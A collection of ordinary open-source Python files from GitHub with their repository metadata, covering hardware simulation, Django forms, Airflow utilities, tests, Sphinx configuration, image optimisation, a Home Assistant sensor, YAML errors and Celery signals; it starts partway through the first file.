self.dut.in_ready <= 0
self.dut.out_ready <= 0
self.dut.in_command <= 0
self.dut.in_address <= 0
self.dut.in_data <= 0
self.dut.in_data_count <= 0
yield(self.wait_clocks(RESET_PERIOD / 2))
self.dut.rst <= 0
yield(self.wait_clocks(RESET_PERIOD / 2))
yield( self.wait_clocks(10))
self.comm_lock.release()
#print "Reset Release Lock"
@cocotb.coroutine
def ping(self):
timeout_count = 0
while timeout_count < self.timeout:
yield RisingEdge(self.dut.clk)
timeout_count += 1
yield ReadOnly()
if self.master_ready.value.get_value() == 0:
continue
else:
break
if timeout_count == self.timeout:
self.dut.log.error("Timed out while waiting for master to be ready")
return
yield ReadWrite()
self.dut.in_ready <= 1
self.dut.in_command <= 0
self.dut.in_data <= 0
self.dut.in_address <= 0
self.dut.in_data_count <= 0
self.dut.out_ready <= 1
timeout_count = 0
while timeout_count < self.timeout:
yield RisingEdge(self.dut.clk)
timeout_count += 1
yield ReadOnly()
if self.dut.out_en.value.get_value() == 0:
continue
else:
break
if timeout_count == self.timeout:
self.dut.log.error("Timed out while waiting for master to respond")
return
self.dut.in_ready <= 0
self.dut.log.info("Master Responded to ping")
self.dut.log.info("\t0x%08X" % self.out_status.value.get_value())
def register_interrupt_callback(self, index, callback):
pass
def unregister_interrupt_callback(self, index, callback = None):
pass
def get_sdb_base_address(self):
return 0x0
def get_board_name(self):
return "Cocotb"
def upload(self, filepath):
pass
def program(self):
pass
|
{
"content_hash": "6a41e95c91bb9edbf465ac33529eefff",
"timestamp": "",
"source": "github",
"line_count": 304,
"max_line_length": 81,
"avg_line_length": 31.105263157894736,
"alnum_prop": 0.5272842639593909,
"repo_name": "CospanDesign/nysa-verilog",
"id": "1fdcacca747f4769aecd63776a89ce75e48ad56d",
"size": "10151",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "verilog/wishbone/slave/wb_dma/cocotb/model/sim_host.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Coq",
"bytes": "25571"
},
{
"name": "Makefile",
"bytes": "32642"
},
{
"name": "Python",
"bytes": "539357"
},
{
"name": "Shell",
"bytes": "50"
},
{
"name": "Verilog",
"bytes": "3281026"
}
],
"symlink_target": ""
}
|
from django import forms
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
class UserChangeForm(forms.ModelForm):
"""
Edit profile example form for registered users.
"""
first_name = forms.CharField(label=_('First name'), max_length=75)
last_name = forms.CharField(label=_('Last name'), max_length=75)
class Meta:
model = get_user_model()
fields = (
'first_name',
'last_name',
'email',
'description',
)
def clean_first_name(self):
val = self.cleaned_data['first_name'].strip()
if not len(val) > 0:
raise forms.ValidationError(_('Text cannot be empty.'))
return val
def clean_last_name(self):
val = self.cleaned_data['last_name'].strip()
if not len(val) > 0:
raise forms.ValidationError(_('Text cannot be empty.'))
return val
|
{
"content_hash": "90c1c1079d872f4c22eb909b4909c438",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 70,
"avg_line_length": 26.054054054054053,
"alnum_prop": 0.5892116182572614,
"repo_name": "funkbit/django-funky-user",
"id": "491236449d195a1b4aa300e742208ed8d982e917",
"size": "964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/testapp/forms.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "27711"
}
],
"symlink_target": ""
}
|
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import object
from cgi import escape
from io import BytesIO as IO
import gzip
import functools
from flask import after_this_request, request
from flask.ext.login import current_user
import wtforms
from wtforms.compat import text_type
from airflow import configuration
from airflow import login, models, settings
AUTHENTICATE = configuration.getboolean('webserver', 'AUTHENTICATE')
class LoginMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or (
not current_user.is_anonymous() and
current_user.is_authenticated()
)
)
class SuperUserMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or
(not current_user.is_anonymous() and current_user.is_superuser())
)
class DataProfilingMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or
(not current_user.is_anonymous() and current_user.data_profiling())
)
def limit_sql(sql, limit, conn_type):
sql = sql.strip()
sql = sql.rstrip(';')
if sql.lower().startswith("select"):
if conn_type in ['mssql']:
sql = """\
SELECT TOP {limit} * FROM (
{sql}
) qry
""".format(**locals())
elif conn_type in ['oracle']:
sql = """\
SELECT * FROM (
{sql}
) qry
WHERE ROWNUM <= {limit}
""".format(**locals())
else:
sql = """\
SELECT * FROM (
{sql}
) qry
LIMIT {limit}
""".format(**locals())
return sql
def action_logging(f):
'''
Decorator to log user actions
'''
@functools.wraps(f)
def wrapper(*args, **kwargs):
session = settings.Session()
if current_user and hasattr(current_user, 'username'):
user = current_user.username
else:
user = 'anonymous'
session.add(
models.Log(
event=f.__name__,
task_instance=None,
owner=user,
extra=str(request.args.items())))
session.commit()
return f(*args, **kwargs)
return wrapper
def gzipped(f):
'''
Decorator to make a view compressed
'''
@functools.wraps(f)
def view_func(*args, **kwargs):
@after_this_request
def zipper(response):
accept_encoding = request.headers.get('Accept-Encoding', '')
if 'gzip' not in accept_encoding.lower():
return response
response.direct_passthrough = False
if (response.status_code < 200 or
response.status_code >= 300 or
'Content-Encoding' in response.headers):
return response
gzip_buffer = IO()
gzip_file = gzip.GzipFile(mode='wb',
fileobj=gzip_buffer)
gzip_file.write(response.data)
gzip_file.close()
response.data = gzip_buffer.getvalue()
response.headers['Content-Encoding'] = 'gzip'
response.headers['Vary'] = 'Accept-Encoding'
response.headers['Content-Length'] = len(response.data)
return response
return f(*args, **kwargs)
return view_func
def make_cache_key(*args, **kwargs):
'''
Used by cache to get a unique key per URL
'''
path = request.path
args = str(hash(frozenset(request.args.items())))
return (path + args).encode('ascii', 'ignore')
class AceEditorWidget(wtforms.widgets.TextArea):
"""
Renders an ACE code editor.
"""
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
html = '''
<div id="{el_id}" style="height:100px;">{contents}</div>
<textarea
id="{el_id}_ace" name="{form_name}"
style="display:none;visibility:hidden;">
</textarea>
'''.format(
el_id=kwargs.get('id', field.id),
contents=escape(text_type(field._value())),
form_name=field.id,
)
return wtforms.widgets.core.HTMLString(html)
|
{
"content_hash": "8b1179d2bf597da9570f0ab3f3ecf52b",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 79,
"avg_line_length": 27.080745341614907,
"alnum_prop": 0.5493119266055045,
"repo_name": "storpipfugl/airflow",
"id": "a796bf525b4d6e5b3cc02e91437aa8378e75aae8",
"size": "4360",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "airflow/www/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "36119"
},
{
"name": "HTML",
"bytes": "95588"
},
{
"name": "JavaScript",
"bytes": "895747"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "571387"
},
{
"name": "Shell",
"bytes": "5301"
}
],
"symlink_target": ""
}
|
import unittest
import numpy
import six
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class TestSoftmax(unittest.TestCase):
def setUp(self):
self.x = numpy.random.uniform(-1, 1, (2, 3)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (2, 3)).astype(numpy.float32)
def check_forward(self, x_data, use_cudnn=True):
x = chainer.Variable(x_data)
y = functions.softmax(x, use_cudnn)
self.assertEqual(y.data.dtype, numpy.float32)
y_expect = numpy.exp(self.x)
for i in six.moves.range(y_expect.shape[0]):
y_expect[i] /= y_expect[i].sum()
gradient_check.assert_allclose(y_expect, y.data)
@condition.retry(3)
def test_forward_cpu(self):
self.check_forward(self.x)
@attr.cudnn
@condition.retry(3)
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.x))
@attr.gpu
@condition.retry(3)
def test_forwrad_gpu_no_cudnn(self):
self.check_forward(cuda.to_gpu(self.x), False)
def check_backward(self, x_data, gy_data, use_cudnn=True):
x = chainer.Variable(x_data)
y = functions.softmax(x, use_cudnn)
y.grad = gy_data
y.backward()
func = y.creator
f = lambda: func.forward((x.data,))
gx, = gradient_check.numerical_grad(f, (x.data,), (y.grad,), eps=1e-2)
gradient_check.assert_allclose(gx, x.grad)
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.x, self.gy)
@attr.cudnn
@condition.retry(3)
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.gy))
@attr.gpu
@condition.retry(3)
def test_backward_gpu_no_cudnn(self):
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.gy), False)
testing.run_module(__name__, __file__)
|
{
"content_hash": "7c972d7e7481a9a20fb0424c9e1e2b97",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 26.844155844155843,
"alnum_prop": 0.6390904692791485,
"repo_name": "elviswf/chainer",
"id": "b3dc83e0b0131d1c9293a4105fa673271cd9120b",
"size": "2067",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/functions_tests/test_softmax.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "582414"
}
],
"symlink_target": ""
}
|
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
autodoc_member_order = 'bysource'
intersphinx_mapping = {
'python': ('http://docs.python.org/2.7', None)
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'csvkit'
copyright = u'2012, Christopher Groskopf'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6.2'
# The full version, including alpha/beta/rc tags.
release = '0.6.2 (beta)'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'csvkitdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'csvkit.tex', u'csvkit Documentation',
u'Christopher Groskopf', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
# ('scripts/csvcut', 'csvcut', u'csvcut Documentation',
# [u'Christopher Groskopf'], 1),
]
for filename in os.listdir('scripts'):
name = os.path.splitext(filename)[0]
man_pages.append((
os.path.join('scripts', name),
name,
'%s Documentation' % name,
[u'Christopher Groskopf'],
1
))
|
{
"content_hash": "2324e265e64ef42825a069dde8749b37",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 80,
"avg_line_length": 31.98173515981735,
"alnum_prop": 0.700028555111365,
"repo_name": "metasoarous/csvkit",
"id": "db470f8c55414a10cc00b96d6137c82df8ddb7ab",
"size": "7421",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Prolog",
"bytes": "501000"
},
{
"name": "Python",
"bytes": "212491"
}
],
"symlink_target": ""
}
|
import os.path
from optimiser.optimiser import Optimiser
import logging
class OptimiseJPG(Optimiser):
"""
Optimises jpegs with jpegtran (part of libjpeg)
"""
def __init__(self, **kwargs):
super(OptimiseJPG, self).__init__(**kwargs)
strip_jpg_meta = kwargs.pop('strip_jpg_meta')
# the command to execute this optimiser
if strip_jpg_meta:
self.commands = ('jpegtran -outfile "__OUTPUT__" -optimise -copy none "__INPUT__"',
'jpegtran -outfile "__OUTPUT__" -optimise -progressive "__INPUT__"')
else:
self.commands = ('jpegtran -outfile "__OUTPUT__" -optimise -copy all "__INPUT__"',
'jpegtran -outfile "__OUTPUT__" -optimise -progressive -copy all "__INPUT__"')
# format as returned by 'identify'
self.format = "JPEG"
def _get_command(self):
"""
Returns the next command to apply
"""
# for the first iteration, return the first command
if self.iterations == 0:
self.iterations += 1
return self.commands[0]
elif self.iterations == 1:
self.iterations += 1
# for the next one, only return the second command if file size > 10kb
if os.path.getsize(self.input) > 10000:
if self.quiet == False:
logging.warning("File is > 10kb - will be converted to progressive")
return self.commands[1]
return False
|
{
"content_hash": "e42d14ebfe7d02841377cf96e74061a6",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 95,
"avg_line_length": 33.888888888888886,
"alnum_prop": 0.5580327868852459,
"repo_name": "thebeansgroup/smush.py",
"id": "3334a5bd3297e3803152d0313523f09a086dc447",
"size": "1525",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smush/optimiser/formats/jpg.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25738"
}
],
"symlink_target": ""
}
|
"""
Support for Waze travel time sensor.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.waze_travel_time/
"""
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, CONF_NAME, CONF_REGION, EVENT_HOMEASSISTANT_START,
ATTR_LATITUDE, ATTR_LONGITUDE)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import location
from homeassistant.helpers.entity import Entity
REQUIREMENTS = ['WazeRouteCalculator==0.6']
_LOGGER = logging.getLogger(__name__)
ATTR_DURATION = 'duration'
ATTR_DISTANCE = 'distance'
ATTR_ROUTE = 'route'
CONF_ATTRIBUTION = "Data provided by the Waze.com"
CONF_DESTINATION = 'destination'
CONF_ORIGIN = 'origin'
CONF_INCL_FILTER = 'incl_filter'
CONF_EXCL_FILTER = 'excl_filter'
CONF_REALTIME = 'realtime'
DEFAULT_NAME = 'Waze Travel Time'
DEFAULT_REALTIME = True
ICON = 'mdi:car'
REGIONS = ['US', 'NA', 'EU', 'IL']
SCAN_INTERVAL = timedelta(minutes=5)
TRACKABLE_DOMAINS = ['device_tracker', 'sensor', 'zone']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_ORIGIN): cv.string,
vol.Required(CONF_DESTINATION): cv.string,
vol.Required(CONF_REGION): vol.In(REGIONS),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_INCL_FILTER): cv.string,
vol.Optional(CONF_EXCL_FILTER): cv.string,
vol.Optional(CONF_REALTIME, default=DEFAULT_REALTIME): cv.boolean,
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Waze travel time sensor platform."""
destination = config.get(CONF_DESTINATION)
name = config.get(CONF_NAME)
origin = config.get(CONF_ORIGIN)
region = config.get(CONF_REGION)
incl_filter = config.get(CONF_INCL_FILTER)
excl_filter = config.get(CONF_EXCL_FILTER)
realtime = config.get(CONF_REALTIME)
sensor = WazeTravelTime(name, origin, destination, region,
incl_filter, excl_filter, realtime)
add_entities([sensor])
# Wait until start event is sent to load this component.
hass.bus.listen_once(
EVENT_HOMEASSISTANT_START, lambda _: sensor.update())
def _get_location_from_attributes(state):
"""Get the lat/long string from an states attributes."""
attr = state.attributes
return '{},{}'.format(attr.get(ATTR_LATITUDE), attr.get(ATTR_LONGITUDE))
class WazeTravelTime(Entity):
"""Representation of a Waze travel time sensor."""
def __init__(self, name, origin, destination, region,
incl_filter, excl_filter, realtime):
"""Initialize the Waze travel time sensor."""
self._name = name
self._region = region
self._incl_filter = incl_filter
self._excl_filter = excl_filter
self._realtime = realtime
self._state = None
self._origin_entity_id = None
self._destination_entity_id = None
if origin.split('.', 1)[0] in TRACKABLE_DOMAINS:
self._origin_entity_id = origin
else:
self._origin = origin
if destination.split('.', 1)[0] in TRACKABLE_DOMAINS:
self._destination_entity_id = destination
else:
self._destination = destination
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
if self._state is None:
return None
if 'duration' in self._state:
return round(self._state['duration'])
return None
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return 'min'
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return ICON
@property
def device_state_attributes(self):
"""Return the state attributes of the last update."""
if self._state is None:
return None
res = {ATTR_ATTRIBUTION: CONF_ATTRIBUTION}
if 'duration' in self._state:
res[ATTR_DURATION] = self._state['duration']
if 'distance' in self._state:
res[ATTR_DISTANCE] = self._state['distance']
if 'route' in self._state:
res[ATTR_ROUTE] = self._state['route']
return res
def _get_location_from_entity(self, entity_id):
"""Get the location from the entity_id."""
state = self.hass.states.get(entity_id)
if state is None:
_LOGGER.error("Unable to find entity %s", entity_id)
return None
# Check if the entity has location attributes (zone)
if location.has_location(state):
return _get_location_from_attributes(state)
# Check if device is in a zone (device_tracker)
zone_state = self.hass.states.get('zone.{}'.format(state.state))
if location.has_location(zone_state):
_LOGGER.debug(
"%s is in %s, getting zone location",
entity_id, zone_state.entity_id
)
return _get_location_from_attributes(zone_state)
# If zone was not found in state then use the state as the location
if entity_id.startswith('sensor.'):
return state.state
# When everything fails just return nothing
return None
def _resolve_zone(self, friendly_name):
"""Get a lat/long from a zones friendly_name."""
states = self.hass.states.all()
for state in states:
if state.domain == 'zone' and state.name == friendly_name:
return _get_location_from_attributes(state)
return friendly_name
def update(self):
"""Fetch new state data for the sensor."""
import WazeRouteCalculator
if self._origin_entity_id is not None:
self._origin = self._get_location_from_entity(
self._origin_entity_id)
if self._destination_entity_id is not None:
self._destination = self._get_location_from_entity(
self._destination_entity_id)
self._destination = self._resolve_zone(self._destination)
self._origin = self._resolve_zone(self._origin)
if self._destination is not None and self._origin is not None:
try:
params = WazeRouteCalculator.WazeRouteCalculator(
self._origin, self._destination, self._region)
routes = params.calc_all_routes_info(real_time=self._realtime)
if self._incl_filter is not None:
routes = {k: v for k, v in routes.items() if
self._incl_filter.lower() in k.lower()}
if self._excl_filter is not None:
routes = {k: v for k, v in routes.items() if
self._excl_filter.lower() not in k.lower()}
route = sorted(routes, key=(lambda key: routes[key][0]))[0]
duration, distance = routes[route]
route = bytes(route, 'ISO-8859-1').decode('UTF-8')
self._state = {
'duration': duration,
'distance': distance,
'route': route,
}
except WazeRouteCalculator.WRCError as exp:
_LOGGER.error("Error on retrieving data: %s", exp)
return
except KeyError:
_LOGGER.error("Error retrieving data from server")
return
|
{
"content_hash": "a126a60af574e24966b2b9a03dbc80c5",
"timestamp": "",
"source": "github",
"line_count": 227,
"max_line_length": 78,
"avg_line_length": 33.82378854625551,
"alnum_prop": 0.6100547017452461,
"repo_name": "persandstrom/home-assistant",
"id": "e4cc8381edee157065a6fa257c9344803bda83cf",
"size": "7678",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "homeassistant/components/sensor/waze_travel_time.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1067"
},
{
"name": "Python",
"bytes": "11745210"
},
{
"name": "Ruby",
"bytes": "518"
},
{
"name": "Shell",
"bytes": "16652"
}
],
"symlink_target": ""
}
|
__all__ = ['Mark', 'YAMLError', 'MarkedYAMLError']
class Mark(object):
def __init__(self, name, index, line, column, buffer, pointer):
self.name = name
self.index = index
self.line = line
self.column = column
self.buffer = buffer
self.pointer = pointer
def get_snippet(self, indent=4, max_length=75):
if self.buffer is None:
return None
head = ''
start = self.pointer
while start > 0 and self.buffer[start-1] not in u'\0\r\n\x85\u2028\u2029':
start -= 1
if self.pointer-start > max_length/2-1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while end < len(self.buffer) and self.buffer[end] not in u'\0\r\n\x85\u2028\u2029':
end += 1
if end-self.pointer > max_length/2-1:
tail = ' ... '
end -= 5
break
snippet = self.buffer[start:end].encode('utf-8')
return ' '*indent + head + snippet + tail + '\n' \
+ ' '*(indent+self.pointer-start+len(head)) + '^'
def __str__(self):
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line+1, self.column+1)
if snippet is not None:
where += ":\n"+snippet
return where
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None):
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
def __str__(self):
lines = []
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None
or self.context_mark.name != self.problem_mark.name
or self.context_mark.line != self.problem_mark.line
or self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None:
lines.append(self.note)
return '\n'.join(lines)
|
{
"content_hash": "fcebfc0a75766b2d5c345c95af267a0b",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 91,
"avg_line_length": 34.567567567567565,
"alnum_prop": 0.5304925723221267,
"repo_name": "Sorsly/subtle",
"id": "bfb99f226611739bae5bb6665db782c61f3064ad",
"size": "2581",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "google-cloud-sdk/platform/bq/third_party/yaml/error.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1581"
},
{
"name": "CSS",
"bytes": "226"
},
{
"name": "HTML",
"bytes": "4637"
},
{
"name": "JavaScript",
"bytes": "3037"
},
{
"name": "PHP",
"bytes": "4543"
},
{
"name": "Pascal",
"bytes": "31"
},
{
"name": "Python",
"bytes": "13243860"
},
{
"name": "Roff",
"bytes": "1050600"
},
{
"name": "Shell",
"bytes": "16136"
},
{
"name": "Smarty",
"bytes": "2484"
},
{
"name": "SourcePawn",
"bytes": "308"
}
],
"symlink_target": ""
}
|
import os
import traceback
from builtins import str
from celery.signals import after_task_publish
from celery.signals import task_failure
from celery.signals import task_success
from celery.utils.log import get_task_logger
from django.core.exceptions import ObjectDoesNotExist
from contentcuration.models import Task
# because Celery connects signals upon import, we don't want to put signals into other modules that may be
# imported multiple times. Instead, we follow the advice here and use AppConfig.init to import the module:
# https://stackoverflow.com/questions/7115097/the-right-place-to-keep-my-signals-py-file-in-a-django-project/21612050#21612050
logger = get_task_logger(__name__)
@after_task_publish.connect
def before_start(sender, headers, body, **kwargs):
"""
Create a Task object before the task actually started,
set the task object status to be PENDING, with the signal
after_task_publish to indicate that the task has been
sent to the broker.
"""
task_id = headers["id"]
try:
task = Task.objects.get(task_id=task_id)
task.status = "PENDING"
task.save()
logger.info("Task object {} updated with status PENDING.".format(task_id))
except ObjectDoesNotExist:
# If the object doesn't exist, that likely means the task was created outside of create_async_task
pass
@task_failure.connect
def on_failure(sender, **kwargs):
try:
task = Task.objects.get(task_id=sender.request.id)
task.status = "FAILURE"
task_args = []
task_kwargs = []
# arg values may be objects, so we need to ensure they are string representation for JSON serialization.
for arg in kwargs['args']:
task_args.append(str(arg))
for kwarg in kwargs['kwargs']:
task_kwargs.append(str(kwarg))
exception_data = {
'task_args': task_args,
'task_kwargs': task_kwargs,
'traceback': traceback.format_tb(kwargs['traceback'])
}
if 'error' not in task.metadata:
task.metadata['error'] = {}
task.metadata['error'].update(exception_data)
task.save()
except ObjectDoesNotExist:
pass # If the object doesn't exist, that likely means the task was created outside of create_async_task
@task_success.connect
def on_success(sender, result, **kwargs):
try:
logger.info("on_success called, process is {}".format(os.getpid()))
task_id = sender.request.id
task = Task.objects.get(task_id=task_id)
task.status = "SUCCESS"
task.metadata['result'] = result
# We're finished, so go ahead and record 100% progress so that getters expecting it get a value
# even though there is no longer a Celery task to query.
if task.is_progress_tracking:
task.metadata['progress'] = 100
task.save()
logger.info("Task with ID {} succeeded".format(task_id))
except ObjectDoesNotExist:
pass # If the object doesn't exist, that likely means the task was created outside of create_async_task
|
{
"content_hash": "fcb1c928d61eb7f87f785a2c0470f252",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 126,
"avg_line_length": 37.97560975609756,
"alnum_prop": 0.6711624919717405,
"repo_name": "DXCanas/content-curation",
"id": "8e3021b71c39d9ee303982b96f44fd8e9fd48c84",
"size": "3114",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "contentcuration/contentcuration/utils/celery_signals.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "173955"
},
{
"name": "Dockerfile",
"bytes": "2215"
},
{
"name": "HTML",
"bytes": "503467"
},
{
"name": "JavaScript",
"bytes": "601189"
},
{
"name": "Makefile",
"bytes": "3409"
},
{
"name": "Python",
"bytes": "813881"
},
{
"name": "Shell",
"bytes": "6970"
},
{
"name": "Smarty",
"bytes": "6584"
},
{
"name": "Vue",
"bytes": "21539"
}
],
"symlink_target": ""
}
|
import requests
while True:
req = requests.get('http://www.google.de')
if req.status_code == 200:
print('**********************************')
print('* Internet Connection available. *')
print('**********************************')
break
|
{
"content_hash": "208123e14847c666ebf06f3ef997a2ef",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 45,
"avg_line_length": 27.333333333333332,
"alnum_prop": 0.47560975609756095,
"repo_name": "jack6347/tools",
"id": "37c1bad1b7b8f4fc361f028819b19c87b47a7b2d",
"size": "246",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "check_internet_connection.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3387"
}
],
"symlink_target": ""
}
|
from CoreFoundation import CFPreferencesCopyAppValue
factoid = "software_update_server"
def fact():
"""Returns the software update server"""
sus = "None"
sus = CFPreferencesCopyAppValue(
"CatalogURL", "/Library/Preferences/com.apple.SoftwareUpdate.plist"
)
return {factoid: str(sus)}
if __name__ == "__main__":
print("<result>%s</result>" % fact()[factoid])
|
{
"content_hash": "bc90354e6158720c23a97e90d9c58e28",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 75,
"avg_line_length": 22.055555555555557,
"alnum_prop": 0.6574307304785895,
"repo_name": "chilcote/unearth",
"id": "8dbf8eb75d44648ca3781dc4859b9f441f0d69db",
"size": "397",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "artifacts/software_update_server.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
